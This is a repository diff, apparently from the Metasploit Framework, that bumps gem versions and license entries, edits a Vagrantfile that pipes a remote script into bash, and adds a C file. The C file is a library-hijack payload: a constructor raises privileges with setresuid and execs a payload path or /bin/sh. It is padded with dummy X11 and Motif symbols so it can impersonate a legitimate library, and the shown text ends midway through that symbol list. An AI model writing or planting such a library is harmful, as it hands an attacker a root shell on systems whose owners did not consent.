@@ -71,6 +71,10 @@ Files: lib/anemone.rb lib/anemone/*
|
||||
Copyright: 2009 Vertive, Inc.
|
||||
License: MIT
|
||||
|
||||
Files: lib/expect.rb
|
||||
Copyright: 2017 Yukihiro Matsumoto
|
||||
License: Ruby
|
||||
|
||||
Files: lib/msf/core/modules/external/python/async_timeout/*
|
||||
Copyright: 2016-2017 Andrew Svetlov
|
||||
License: Apache 2.0
|
||||
|
||||
+73
-53
@@ -1,131 +1,150 @@
|
||||
This file is auto-generated by tools/dev/update_gem_licenses.sh
|
||||
Ascii85, 1.0.3, MIT
|
||||
actionpack, 4.2.11.1, MIT
|
||||
actionview, 4.2.11.1, MIT
|
||||
activemodel, 4.2.11.1, MIT
|
||||
activerecord, 4.2.11.1, MIT
|
||||
activesupport, 4.2.11.1, MIT
|
||||
actionpack, 4.2.11.3, MIT
|
||||
actionview, 4.2.11.3, MIT
|
||||
activemodel, 4.2.11.3, MIT
|
||||
activerecord, 4.2.11.3, MIT
|
||||
activesupport, 4.2.11.3, MIT
|
||||
addressable, 2.7.0, "Apache 2.0"
|
||||
afm, 0.2.2, MIT
|
||||
arel, 6.0.4, MIT
|
||||
arel-helpers, 2.11.0, MIT
|
||||
aws-eventstream, 1.0.3, "Apache 2.0"
|
||||
aws-partitions, 1.269.0, "Apache 2.0"
|
||||
aws-sdk-core, 3.89.1, "Apache 2.0"
|
||||
aws-sdk-ec2, 1.137.0, "Apache 2.0"
|
||||
aws-sdk-iam, 1.33.0, "Apache 2.0"
|
||||
aws-sdk-kms, 1.28.0, "Apache 2.0"
|
||||
aws-sdk-s3, 1.60.1, "Apache 2.0"
|
||||
aws-sigv4, 1.1.0, "Apache 2.0"
|
||||
ast, 2.4.1, MIT
|
||||
aws-eventstream, 1.1.0, "Apache 2.0"
|
||||
aws-partitions, 1.330.0, "Apache 2.0"
|
||||
aws-sdk-core, 3.100.0, "Apache 2.0"
|
||||
aws-sdk-ec2, 1.167.0, "Apache 2.0"
|
||||
aws-sdk-iam, 1.40.1, "Apache 2.0"
|
||||
aws-sdk-kms, 1.34.1, "Apache 2.0"
|
||||
aws-sdk-s3, 1.68.1, "Apache 2.0"
|
||||
aws-sigv4, 1.2.0, "Apache 2.0"
|
||||
bcrypt, 3.1.12, MIT
|
||||
bcrypt_pbkdf, 1.0.1, MIT
|
||||
bindata, 2.4.4, ruby
|
||||
bindata, 2.4.7, ruby
|
||||
bit-struct, 0.16, ruby
|
||||
bson, 4.9.2, "Apache 2.0"
|
||||
builder, 3.2.4, MIT
|
||||
bundler, 1.17.3, MIT
|
||||
coderay, 1.1.2, MIT
|
||||
byebug, 11.1.3, "Simplified BSD"
|
||||
coderay, 1.1.3, MIT
|
||||
concurrent-ruby, 1.0.5, MIT
|
||||
cookiejar, 0.3.3, unknown
|
||||
crass, 1.0.6, MIT
|
||||
daemons, 1.3.1, MIT
|
||||
diff-lcs, 1.3, "Artistic-2.0, GPL-2.0+, MIT"
|
||||
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
|
||||
dnsruby, 1.61.3, "Apache 2.0"
|
||||
docile, 1.3.2, MIT
|
||||
ed25519, 1.2.4, MIT
|
||||
em-http-request, 1.1.5, MIT
|
||||
em-http-request, 1.1.6, MIT
|
||||
em-socksify, 0.3.2, MIT
|
||||
erubis, 2.7.0, MIT
|
||||
eventmachine, 1.2.7, "GPL-2.0, ruby"
|
||||
factory_bot, 5.1.1, MIT
|
||||
factory_bot_rails, 5.1.1, MIT
|
||||
eventmachine, 1.2.7, "ruby, GPL-2.0"
|
||||
factory_bot, 5.2.0, MIT
|
||||
factory_bot_rails, 5.2.0, MIT
|
||||
faker, 2.2.1, MIT
|
||||
faraday, 0.17.0, MIT
|
||||
faraday, 1.0.1, MIT
|
||||
faye-websocket, 0.10.9, "Apache 2.0"
|
||||
filesize, 0.2.0, MIT
|
||||
fivemat, 1.3.7, MIT
|
||||
hashery, 2.1.2, "Simplified BSD"
|
||||
hrr_rb_ssh, 0.3.0.pre2, "Apache 2.0"
|
||||
http_parser.rb, 0.6.0, MIT
|
||||
i18n, 0.9.5, MIT
|
||||
io-console, 0.5.6, "Simplified BSD"
|
||||
irb, 1.2.4, "Simplified BSD"
|
||||
jmespath, 1.4.0, "Apache 2.0"
|
||||
jsobfu, 0.4.2, "New BSD"
|
||||
json, 2.3.0, ruby
|
||||
loofah, 2.4.0, MIT
|
||||
loofah, 2.6.0, MIT
|
||||
memory_profiler, 0.9.14, MIT
|
||||
metasm, 1.0.4, LGPL-2.1
|
||||
metasploit-concern, 2.0.5, "New BSD"
|
||||
metasploit-credential, 3.0.4, "New BSD"
|
||||
metasploit-framework, 5.0.73, "New BSD"
|
||||
metasploit-framework, 5.0.95, "New BSD"
|
||||
metasploit-model, 2.0.4, "New BSD"
|
||||
metasploit-payloads, 1.3.84, "3-clause (or ""modified"") BSD"
|
||||
metasploit-payloads, 1.4.2, "3-clause (or ""modified"") BSD"
|
||||
metasploit_data_models, 3.0.10, "New BSD"
|
||||
metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
|
||||
method_source, 0.9.2, MIT
|
||||
metasploit_payloads-mettle, 0.5.21, "3-clause (or ""modified"") BSD"
|
||||
method_source, 1.0.0, MIT
|
||||
mini_portile2, 2.4.0, MIT
|
||||
minitest, 5.14.0, MIT
|
||||
minitest, 5.14.1, MIT
|
||||
mqtt, 0.5.0, MIT
|
||||
msgpack, 1.3.1, "Apache 2.0"
|
||||
msgpack, 1.3.3, "Apache 2.0"
|
||||
multipart-post, 2.1.1, MIT
|
||||
nessus_rest, 0.1.6, MIT
|
||||
net-ssh, 5.2.0, MIT
|
||||
net-ldap, 0.16.2, MIT
|
||||
net-ssh, 6.1.0, MIT
|
||||
network_interface, 0.0.2, MIT
|
||||
nexpose, 7.2.1, "New BSD"
|
||||
nokogiri, 1.10.7, MIT
|
||||
octokit, 4.15.0, MIT
|
||||
nokogiri, 1.10.9, MIT
|
||||
octokit, 4.18.0, MIT
|
||||
openssl-ccm, 1.2.2, MIT
|
||||
openvas-omp, 0.0.4, MIT
|
||||
packetfu, 1.1.13, BSD
|
||||
parallel, 1.19.2, MIT
|
||||
parser, 2.7.1.3, MIT
|
||||
patch_finder, 1.0.2, "New BSD"
|
||||
pcaprub, 0.13.0, LGPL-2.1
|
||||
pdf-reader, 2.4.0, MIT
|
||||
pg, 0.21.0, "New BSD"
|
||||
pg_array_parser, 0.0.9, unknown
|
||||
postgres_ext, 3.0.1, MIT
|
||||
pry, 0.12.2, MIT
|
||||
public_suffix, 4.0.3, MIT
|
||||
rack, 1.6.12, MIT
|
||||
pry, 0.13.1, MIT
|
||||
pry-byebug, 3.9.0, MIT
|
||||
public_suffix, 4.0.5, MIT
|
||||
rack, 1.6.13, MIT
|
||||
rack-protection, 1.5.5, MIT
|
||||
rack-test, 0.6.3, MIT
|
||||
rails-deprecated_sanitizer, 1.0.3, MIT
|
||||
rails-dom-testing, 1.0.9, MIT
|
||||
rails-html-sanitizer, 1.3.0, MIT
|
||||
railties, 4.2.11.1, MIT
|
||||
railties, 4.2.11.3, MIT
|
||||
rainbow, 3.0.0, MIT
|
||||
rake, 13.0.1, MIT
|
||||
rb-readline, 0.5.5, BSD
|
||||
recog, 2.3.6, unknown
|
||||
recog, 2.3.8, unknown
|
||||
redcarpet, 3.5.0, MIT
|
||||
regexp_parser, 1.7.1, MIT
|
||||
reline, 0.1.4, "Ruby License"
|
||||
rex-arch, 0.1.13, "New BSD"
|
||||
rex-bin_tools, 0.1.6, "New BSD"
|
||||
rex-core, 0.1.13, "New BSD"
|
||||
rex-encoder, 0.1.4, "New BSD"
|
||||
rex-exploitation, 0.1.22, "New BSD"
|
||||
rex-exploitation, 0.1.24, "New BSD"
|
||||
rex-java, 0.1.5, "New BSD"
|
||||
rex-mime, 0.1.5, "New BSD"
|
||||
rex-nop, 0.1.1, "New BSD"
|
||||
rex-ole, 0.1.6, "New BSD"
|
||||
rex-powershell, 0.1.84, "New BSD"
|
||||
rex-powershell, 0.1.87, "New BSD"
|
||||
rex-random_identifier, 0.1.4, "New BSD"
|
||||
rex-registry, 0.1.3, "New BSD"
|
||||
rex-rop_builder, 0.1.3, "New BSD"
|
||||
rex-socket, 0.1.21, "New BSD"
|
||||
rex-socket, 0.1.23, "New BSD"
|
||||
rex-sslscan, 0.1.5, "New BSD"
|
||||
rex-struct2, 0.1.2, "New BSD"
|
||||
rex-text, 0.2.24, "New BSD"
|
||||
rex-text, 0.2.26, "New BSD"
|
||||
rex-zip, 0.1.3, "New BSD"
|
||||
rexml, 3.2.4, "Simplified BSD"
|
||||
rkelly-remix, 0.0.7, MIT
|
||||
rspec, 3.9.0, MIT
|
||||
rspec-core, 3.9.1, MIT
|
||||
rspec-expectations, 3.9.0, MIT
|
||||
rspec-core, 3.9.2, MIT
|
||||
rspec-expectations, 3.9.2, MIT
|
||||
rspec-mocks, 3.9.1, MIT
|
||||
rspec-rails, 3.9.0, MIT
|
||||
rspec-rails, 4.0.1, MIT
|
||||
rspec-rerun, 1.1.0, MIT
|
||||
rspec-support, 3.9.2, MIT
|
||||
rspec-support, 3.9.3, MIT
|
||||
rubocop, 0.85.1, MIT
|
||||
rubocop-ast, 0.0.3, MIT
|
||||
ruby-macho, 2.2.0, MIT
|
||||
ruby-prof, 1.4.1, "Simplified BSD"
|
||||
ruby-progressbar, 1.10.1, MIT
|
||||
ruby-rc4, 0.1.5, MIT
|
||||
ruby_smb, 1.1.0, "New BSD"
|
||||
rubyntlm, 0.6.2, MIT
|
||||
rubyzip, 2.1.0, "Simplified BSD"
|
||||
rubyzip, 2.3.0, "Simplified BSD"
|
||||
sawyer, 0.8.2, MIT
|
||||
simplecov, 0.18.0, MIT
|
||||
simplecov-html, 0.11.0, MIT
|
||||
simplecov, 0.18.2, MIT
|
||||
simplecov-html, 0.12.2, MIT
|
||||
sinatra, 1.4.8, MIT
|
||||
sqlite3, 1.3.13, "New BSD"
|
||||
sshkey, 2.0.0, MIT
|
||||
@@ -135,13 +154,14 @@ thor, 1.0.1, MIT
|
||||
thread_safe, 0.3.6, "Apache 2.0"
|
||||
tilt, 2.0.10, MIT
|
||||
timecop, 0.9.1, MIT
|
||||
ttfunk, 1.6.1, "GPL-2.0, GPL-3.0, Nonstandard"
|
||||
tzinfo, 1.2.6, MIT
|
||||
tzinfo-data, 1.2019.3, MIT
|
||||
ttfunk, 1.6.2.1, "Nonstandard, GPL-2.0, GPL-3.0"
|
||||
tzinfo, 1.2.7, MIT
|
||||
tzinfo-data, 1.2020.1, MIT
|
||||
unicode-display_width, 1.7.0, MIT
|
||||
warden, 1.2.7, MIT
|
||||
websocket-driver, 0.7.1, "Apache 2.0"
|
||||
websocket-extensions, 0.1.4, "Apache 2.0"
|
||||
websocket-driver, 0.7.2, "Apache 2.0"
|
||||
websocket-extensions, 0.1.5, "Apache 2.0"
|
||||
windows_error, 0.1.2, BSD
|
||||
xdr, 2.0.0, "Apache 2.0"
|
||||
xmlrpc, 0.3.0, ruby
|
||||
yard, 0.9.24, MIT
|
||||
yard, 0.9.25, MIT
|
||||
|
||||
Vendored
+2
-2
@@ -3,7 +3,7 @@
|
||||
|
||||
Vagrant.configure(2) do |config|
|
||||
config.ssh.forward_x11 = true
|
||||
config.vm.box = "ubuntu/xenial64"
|
||||
config.vm.box = "ubuntu/bionic64"
|
||||
config.vm.network :forwarded_port, guest: 4444, host: 4444
|
||||
config.vm.provider "vmware" do |v|
|
||||
v.memory = 2048
|
||||
@@ -28,7 +28,7 @@ Vagrant.configure(2) do |config|
|
||||
config.vm.provision "shell", inline: step
|
||||
end
|
||||
|
||||
[ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
|
||||
[ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB",
|
||||
"curl -L https://get.rvm.io | bash -s stable",
|
||||
"source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
|
||||
"source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
|
||||
|
||||
@@ -0,0 +1,3643 @@
|
||||
#define _GNU_SOURCE
|
||||
#include <unistd.h>
|
||||
#include <stdlib.h>
|
||||
#include <sys/types.h>
|
||||
#include <stdio.h>
|
||||
#include <dlfcn.h>
|
||||
void __cxa_finalize (void *d) {
|
||||
return;
|
||||
}
|
||||
void __attribute__((constructor)) init() {
|
||||
setresuid(geteuid(), geteuid(), geteuid());
|
||||
execl("#{payload_path}", (char *)NULL, (char *)NULL);
|
||||
execl("/bin/sh", (char *)NULL, (char *)NULL);
|
||||
}
|
||||
int applicationShellClassRec = 0;
|
||||
int applicationShellWidgetClass = 0;
|
||||
int colorConvertArgs = 0;
|
||||
int compositeWidgetClass = 0;
|
||||
int constraintClassRec = 0;
|
||||
int constraintWidgetClass = 0;
|
||||
int coreWidgetClass = 0;
|
||||
int dump_external = 0;
|
||||
int dump_fontlist = 0;
|
||||
int dump_fontlist_cache = 0;
|
||||
int dump_internal = 0;
|
||||
int FcPatternAddInteger = 0;
|
||||
int FcPatternAddString = 0;
|
||||
int FcPatternCreate = 0;
|
||||
int FcPatternDestroy = 0;
|
||||
int GetWidgetNavigPtrs = 0;
|
||||
int InitializeScrollBars = 0;
|
||||
int _ITM_deregisterTMCloneTable = 0;
|
||||
int _ITM_registerTMCloneTable = 0;
|
||||
int jpeg_calc_output_dimensions = 0;
|
||||
int jpeg_CreateDecompress = 0;
|
||||
int jpeg_destroy_decompress = 0;
|
||||
int jpeg_finish_decompress = 0;
|
||||
int jpeg_read_header = 0;
|
||||
int jpeg_read_scanlines = 0;
|
||||
int jpeg_start_decompress = 0;
|
||||
int jpeg_std_error = 0;
|
||||
int jpeg_stdio_src = 0;
|
||||
int load_jpeg = 0;
|
||||
int localeconv = 0;
|
||||
int __longjmp_chk = 0;
|
||||
int nl_langinfo = 0;
|
||||
int NumLockMask = 0;
|
||||
int objectClass = 0;
|
||||
int objectClassRec = 0;
|
||||
int overrideShellClassRec = 0;
|
||||
int png_create_info_struct = 0;
|
||||
int png_create_read_struct = 0;
|
||||
int png_destroy_read_struct = 0;
|
||||
int png_get_channels = 0;
|
||||
int png_get_gAMA = 0;
|
||||
int png_get_IHDR = 0;
|
||||
int png_get_rowbytes = 0;
|
||||
int png_get_valid = 0;
|
||||
int png_init_io = 0;
|
||||
int png_read_end = 0;
|
||||
int png_read_image = 0;
|
||||
int png_read_info = 0;
|
||||
int png_read_update_info = 0;
|
||||
int png_set_expand = 0;
|
||||
int png_set_gamma = 0;
|
||||
int png_set_gray_to_rgb = 0;
|
||||
int png_set_longjmp_fn = 0;
|
||||
int png_set_sig_bytes = 0;
|
||||
int png_set_strip_16 = 0;
|
||||
int png_sig_cmp = 0;
|
||||
int rectObjClass = 0;
|
||||
int rectObjClassRec = 0;
|
||||
int ScrollLockMask = 0;
|
||||
int SetMwmStuff = 0;
|
||||
int T = 0;
|
||||
int topLevelShellWidgetClass = 0;
|
||||
int transientShellClassRec = 0;
|
||||
int transientShellWidgetClass = 0;
|
||||
int V = 0;
|
||||
int vendorShellClassRec = 0;
|
||||
int vendorShellWidgetClass = 0;
|
||||
int W = 0;
|
||||
int __wctomb_chk = 0;
|
||||
int widgetClass = 0;
|
||||
int widgetClassRec = 0;
|
||||
int wmShellClassRec = 0;
|
||||
int wmShellWidgetClass = 0;
|
||||
int XAddExtension = 0;
|
||||
int XAllocColor = 0;
|
||||
int XAllocColorCells = 0;
|
||||
int XAllowEvents = 0;
|
||||
int XBell = 0;
|
||||
int XChangeActivePointerGrab = 0;
|
||||
int XChangeGC = 0;
|
||||
int XChangeProperty = 0;
|
||||
int XChangeWindowAttributes = 0;
|
||||
int XCheckIfEvent = 0;
|
||||
int XCheckMaskEvent = 0;
|
||||
int XClearArea = 0;
|
||||
int XClearWindow = 0;
|
||||
int XCloseDisplay = 0;
|
||||
int XCloseIM = 0;
|
||||
int XConfigureWindow = 0;
|
||||
int XConvertSelection = 0;
|
||||
int XCopyArea = 0;
|
||||
int XCopyPlane = 0;
|
||||
int XCreateBitmapFromData = 0;
|
||||
int XCreateFontCursor = 0;
|
||||
int XCreateGC = 0;
|
||||
int XCreateIC = 0;
|
||||
int XCreateImage = 0;
|
||||
int XCreatePixmap = 0;
|
||||
int XCreatePixmapCursor = 0;
|
||||
int XCreatePixmapFromBitmapData = 0;
|
||||
int XCreateRegion = 0;
|
||||
int XCreateWindow = 0;
|
||||
int XDefaultColormap = 0;
|
||||
int XDefaultDepth = 0;
|
||||
int XDefaultScreen = 0;
|
||||
int XDefaultVisual = 0;
|
||||
int XDefineCursor = 0;
|
||||
int XDeleteContext = 0;
|
||||
int XDeleteProperty = 0;
|
||||
int XDestroyIC = 0;
|
||||
int XDestroyRegion = 0;
|
||||
int XDestroyWindow = 0;
|
||||
int XDisplayKeycodes = 0;
|
||||
int XDisplayOfScreen = 0;
|
||||
int XDisplayString = 0;
|
||||
int XDrawArc = 0;
|
||||
int XDrawImageString = 0;
|
||||
int XDrawImageString16 = 0;
|
||||
int XDrawLine = 0;
|
||||
int XDrawLines = 0;
|
||||
int XDrawPoint = 0;
|
||||
int XDrawRectangle = 0;
|
||||
int XDrawSegments = 0;
|
||||
int XDrawString = 0;
|
||||
int XDrawString16 = 0;
|
||||
int _XEditResGet16 = 0;
|
||||
int _XEditResGet32 = 0;
|
||||
int _XEditResGet8 = 0;
|
||||
int _XEditResGetSigned16 = 0;
|
||||
int _XEditResGetString8 = 0;
|
||||
int _XEditResGetWidgetInfo = 0;
|
||||
int _XEditResPut16 = 0;
|
||||
int _XEditResPut32 = 0;
|
||||
int _XEditResPut8 = 0;
|
||||
int _XEditResPutString8 = 0;
|
||||
int _XEditResPutWidgetInfo = 0;
|
||||
int _XEditResResetStream = 0;
|
||||
int XEmptyRegion = 0;
|
||||
int XEqualRegion = 0;
|
||||
int XESetCloseDisplay = 0;
|
||||
int XExtentsOfFontSet = 0;
|
||||
int XFetchBuffer = 0;
|
||||
int XFillArc = 0;
|
||||
int XFillPolygon = 0;
|
||||
int XFillRectangle = 0;
|
||||
int XFillRectangles = 0;
|
||||
int XFindContext = 0;
|
||||
int XFlush = 0;
|
||||
int XFontsOfFontSet = 0;
|
||||
int XFree = 0;
|
||||
int XFreeColors = 0;
|
||||
int XFreeCursor = 0;
|
||||
int XFreeFont = 0;
|
||||
int XFreeFontNames = 0;
|
||||
int XFreeGC = 0;
|
||||
int XFreeModifiermap = 0;
|
||||
int XFreePixmap = 0;
|
||||
int XFreeStringList = 0;
|
||||
int XftDrawCreate = 0;
|
||||
int XftDrawCreateBitmap = 0;
|
||||
int XftDrawDestroy = 0;
|
||||
int XftDrawRect = 0;
|
||||
int XftDrawSetClip = 0;
|
||||
int XftDrawSetClipRectangles = 0;
|
||||
int XftDrawString16 = 0;
|
||||
int XftDrawString32 = 0;
|
||||
int XftDrawStringUtf8 = 0;
|
||||
int XftFontClose = 0;
|
||||
int XftFontMatch = 0;
|
||||
int XftFontOpenPattern = 0;
|
||||
int XftTextExtents16 = 0;
|
||||
int XftTextExtents32 = 0;
|
||||
int XftTextExtents8 = 0;
|
||||
int XftTextExtentsUtf8 = 0;
|
||||
int XGetAtomName = 0;
|
||||
int XGetFontProperty = 0;
|
||||
int XGetGCValues = 0;
|
||||
int XGetGeometry = 0;
|
||||
int XGetICValues = 0;
|
||||
int XGetImage = 0;
|
||||
int XGetIMValues = 0;
|
||||
int XGetInputFocus = 0;
|
||||
int XGetKeyboardMapping = 0;
|
||||
int XGetModifierMapping = 0;
|
||||
int XGetOCValues = 0;
|
||||
int XGetOMValues = 0;
|
||||
int XGetSelectionOwner = 0;
|
||||
int XGetWindowAttributes = 0;
|
||||
int XGetWindowProperty = 0;
|
||||
int XGetWMColormapWindows = 0;
|
||||
int XGrabKeyboard = 0;
|
||||
int XGrabPointer = 0;
|
||||
int XGrabServer = 0;
|
||||
int XHeightOfScreen = 0;
|
||||
int xiColumnConstraintExtension = 0;
|
||||
int XiCreateStippledPixmap = 0;
|
||||
int _XiGetTabIndex = 0;
|
||||
int XIMOfIC = 0;
|
||||
int XInstallColormap = 0;
|
||||
int XInternAtom = 0;
|
||||
int XInternAtoms = 0;
|
||||
int XIntersectRegion = 0;
|
||||
int XiReleaseStippledPixmap = 0;
|
||||
int _XiResolveAllPartOffsets = 0;
|
||||
int XiResolveAllPartOffsets = 0;
|
||||
int XKeysymToKeycode = 0;
|
||||
int XKeysymToString = 0;
|
||||
int XLastKnownRequestProcessed = 0;
|
||||
int XListFonts = 0;
|
||||
int XListInstalledColormaps = 0;
|
||||
int XLoadQueryFont = 0;
|
||||
int XLookupString = 0;
|
||||
int Xm18IListUnselectAllItems = 0;
|
||||
int Xm18IListUnselectItem = 0;
|
||||
int _XmAccessColorData = 0;
|
||||
int XmActivateProtocol = 0;
|
||||
int _XmAddCallback = 0;
|
||||
int _XmAddGrab = 0;
|
||||
int _XmAddHashEntry = 0;
|
||||
int XmAddProtocolCallback = 0;
|
||||
int XmAddProtocols = 0;
|
||||
int _Xm_AddQueue = 0;
|
||||
int XmAddTabGroup = 0;
|
||||
int _XmAddTearOffEventHandlers = 0;
|
||||
int _XmAddToColorCache = 0;
|
||||
int XmAddToPostFromList = 0;
|
||||
int _XmAllocHashTable = 0;
|
||||
int _XmAllocMotifAtom = 0;
|
||||
int _XmAllocReceiverInfo = 0;
|
||||
int _XmAllocScratchPixmap = 0;
|
||||
int _XmAllowAcceleratedInsensitiveUnmanagedMenuItems = 0;
|
||||
int XMapRaised = 0;
|
||||
int XMapWindow = 0;
|
||||
int _XmArrowB_defaultTranslations = 0;
|
||||
int xmArrowButtonClassRec = 0;
|
||||
int xmArrowButtonGadgetClass = 0;
|
||||
int xmArrowButtonGadgetClassRec = 0;
|
||||
int xmArrowButtonWidgetClass = 0;
|
||||
int _XmArrowPixmapCacheCompare = 0;
|
||||
int _XmArrowPixmapCacheDelete = 0;
|
||||
int _XmAssignInsensitiveColor = 0;
|
||||
int _XmAssignLabG_MarginBottom = 0;
|
||||
int _XmAssignLabG_MarginHeight = 0;
|
||||
int _XmAssignLabG_MarginLeft = 0;
|
||||
int _XmAssignLabG_MarginRight = 0;
|
||||
int _XmAssignLabG_MarginTop = 0;
|
||||
int _XmAssignLabG_MarginWidth = 0;
|
||||
int XMaxRequestSize = 0;
|
||||
int _XmBackgroundColorDefault = 0;
|
||||
int _XmBaseClassPartInitialize = 0;
|
||||
int _XmBB_CreateButtonG = 0;
|
||||
int _XmBB_CreateLabelG = 0;
|
||||
int _XmBB_GetDialogTitle = 0;
|
||||
int _XmBBUpdateDynDefaultButton = 0;
|
||||
int XmbDrawImageString = 0;
|
||||
int XmbDrawString = 0;
|
||||
int _XmBlackPixel = 0;
|
||||
int XmbLookupString = 0;
|
||||
int _XmBottomShadowColorDefault = 0;
|
||||
int XmbResetIC = 0;
|
||||
int XmbTextEscapement = 0;
|
||||
int XmbTextExtents = 0;
|
||||
int XmbTextListToTextProperty = 0;
|
||||
int XmbTextPropertyToTextList = 0;
|
||||
int _XmBuildExtResources = 0;
|
||||
int _XmBuildGadgetResources = 0;
|
||||
int _XmBuildManagerResources = 0;
|
||||
int _XmBuildPrimitiveResources = 0;
|
||||
int _XmBuildResources = 0;
|
||||
int _XmBulletinB_defaultTranslations = 0;
|
||||
int _XmBulletinBoardCancel = 0;
|
||||
int xmBulletinBoardClassRec = 0;
|
||||
int _XmBulletinBoardFocusMoved = 0;
|
||||
int _XmBulletinBoardMap = 0;
|
||||
int _XmBulletinBoardReturn = 0;
|
||||
int _XmBulletinBoardSetDefaultShadow = 0;
|
||||
int _XmBulletinBoardSetDynDefaultButton = 0;
|
||||
int _XmBulletinBoardSizeUpdate = 0;
|
||||
int xmBulletinBoardWidgetClass = 0;
|
||||
int xmButtonBoxClassRec = 0;
|
||||
int xmButtonBoxWidgetClass = 0;
|
||||
int _XmButtonPopdownChildren = 0;
|
||||
int _XmButtonTakeFocus = 0;
|
||||
int _XmByteOrderChar = 0;
|
||||
int _XmCacheCopy = 0;
|
||||
int _XmCacheDelete = 0;
|
||||
int _XmCachePart = 0;
|
||||
int _XmCachePixmap = 0;
|
||||
int _XmCalcLabelDimensions = 0;
|
||||
int _XmCalcLabelGDimensions = 0;
|
||||
int _XmCallCallbackList = 0;
|
||||
int _XmCallFocusMoved = 0;
|
||||
int _XmCallRowColumnMapCallback = 0;
|
||||
int _XmCallRowColumnUnmapCallback = 0;
|
||||
int _XmCascadeB_menubar_events = 0;
|
||||
int _XmCascadeB_p_events = 0;
|
||||
int _XmCascadeBPrimClassExtRec = 0;
|
||||
int xmCascadeButtonClassRec = 0;
|
||||
int xmCascadeButtonGadgetClass = 0;
|
||||
int xmCascadeButtonGadgetClassRec = 0;
|
||||
int XmCascadeButtonGadgetHighlight = 0;
|
||||
int xmCascadeButtonGCacheObjClassRec = 0;
|
||||
int XmCascadeButtonHighlight = 0;
|
||||
int xmCascadeButtonWidgetClass = 0;
|
||||
int _XmCascadingPopup = 0;
|
||||
int _XmCBHelp = 0;
|
||||
int _XmCBNameActivate = 0;
|
||||
int _XmCBNameValueChanged = 0;
|
||||
int XmChangeColor = 0;
|
||||
int _XmChangeHSB = 0;
|
||||
int _XmChangeNavigationType = 0;
|
||||
int _XmChangeVSB = 0;
|
||||
int _XmCharsetCanonicalize = 0;
|
||||
int _XmCleanPixmapCache = 0;
|
||||
int _XmClearBCompatibility = 0;
|
||||
int _XmClearBGCompatibility = 0;
|
||||
int _XmClearBGPixmapName = 0;
|
||||
int _XmClearBorder = 0;
|
||||
int _XmClearDisplayTables = 0;
|
||||
int _XmClearDragReceiverInfo = 0;
|
||||
int _XmClearFocusPath = 0;
|
||||
int _XmClearIconPixmapName = 0;
|
||||
int _XmClearKbdFocus = 0;
|
||||
int _XmClearRect = 0;
|
||||
int _XmClearShadowType = 0;
|
||||
int _XmClearTabGroup = 0;
|
||||
int _XmClearTraversal = 0;
|
||||
int XmClipboardBeginCopy = 0;
|
||||
int XmClipboardCancelCopy = 0;
|
||||
int XmClipboardCopy = 0;
|
||||
int XmClipboardCopyByName = 0;
|
||||
int XmClipboardEndCopy = 0;
|
||||
int XmClipboardEndRetrieve = 0;
|
||||
int XmClipboardInquireCount = 0;
|
||||
int XmClipboardInquireFormat = 0;
|
||||
int XmClipboardInquireLength = 0;
|
||||
int XmClipboardInquirePendingItems = 0;
|
||||
int XmClipboardLock = 0;
|
||||
int _XmClipboardPassType = 0;
|
||||
int XmClipboardRegisterFormat = 0;
|
||||
int XmClipboardRetrieve = 0;
|
||||
int XmClipboardStartCopy = 0;
|
||||
int XmClipboardStartRetrieve = 0;
|
||||
int XmClipboardUndoCopy = 0;
|
||||
int XmClipboardUnlock = 0;
|
||||
int XmClipboardWithdrawFormat = 0;
|
||||
int xmClipWindowClassRec = 0;
|
||||
int _XmClipWindowTranslationTable = 0;
|
||||
int xmClipWindowWidgetClass = 0;
|
||||
int _XmColorObjCache = 0;
|
||||
int _XmColorObjCacheDisplay = 0;
|
||||
int xmColorObjClass = 0;
|
||||
int xmColorObjClassRec = 0;
|
||||
int _XmColorObjCreate = 0;
|
||||
int xmColorSelectorClassRec = 0;
|
||||
int xmColorSelectorWidgetClass = 0;
|
||||
int xmColumnClassRec = 0;
|
||||
int xmColumnWidgetClass = 0;
|
||||
int xmCombinationBox2ClassRec = 0;
|
||||
int XmCombinationBox2GetArrow = 0;
|
||||
int XmCombinationBox2GetChild = 0;
|
||||
int XmCombinationBox2GetLabel = 0;
|
||||
int XmCombinationBox2GetList = 0;
|
||||
int XmCombinationBox2GetText = 0;
|
||||
int XmCombinationBox2GetValue = 0;
|
||||
int xmCombinationBox2WidgetClass = 0;
|
||||
int XmCombinationBoxGetValue = 0;
|
||||
int XmComboBoxAddItem = 0;
|
||||
int xmComboBoxClassRec = 0;
|
||||
int _XmComboBox_defaultAccelerators = 0;
|
||||
int _XmComboBox_defaultTranslations = 0;
|
||||
int XmComboBoxDeletePos = 0;
|
||||
int _XmComboBox_dropDownComboBoxAccelerators = 0;
|
||||
int _XmComboBox_dropDownListTranslations = 0;
|
||||
int XmComboBoxSelectItem = 0;
|
||||
int XmComboBoxSetItem = 0;
|
||||
int _XmComboBox_textFocusTranslations = 0;
|
||||
int XmComboBoxUpdate = 0;
|
||||
int xmComboBoxWidgetClass = 0;
|
||||
int XmCommandAppendValue = 0;
|
||||
int xmCommandClassRec = 0;
|
||||
int XmCommandError = 0;
|
||||
int XmCommandGetChild = 0;
|
||||
int _XmCommandReturn = 0;
|
||||
int XmCommandSetValue = 0;
|
||||
int _XmCommandUpOrDown = 0;
|
||||
int xmCommandWidgetClass = 0;
|
||||
int XmCompareISOLatin1 = 0;
|
||||
int XmCompareXtWidgetGeometry = 0;
|
||||
int XmCompareXtWidgetGeometryToWidget = 0;
|
||||
int _XmComputeVisibilityRect = 0;
|
||||
int _XmConfigureObject = 0;
|
||||
int _XmConfigureWidget = 0;
|
||||
int xmContainerClassRec = 0;
|
||||
int XmContainerCopy = 0;
|
||||
int XmContainerCopyLink = 0;
|
||||
int XmContainerCut = 0;
|
||||
int _XmContainer_defaultTranslations = 0;
|
||||
int XmContainerGetItemChildren = 0;
|
||||
int XmContainerPaste = 0;
|
||||
int XmContainerPasteLink = 0;
|
||||
int XmContainerRelayout = 0;
|
||||
int XmContainerReorder = 0;
|
||||
int _XmContainer_traversalTranslations = 0;
|
||||
int xmContainerWidgetClass = 0;
|
||||
int _XmConvertActionParamToRepTypeId = 0;
|
||||
int _XmConvertComplete = 0;
|
||||
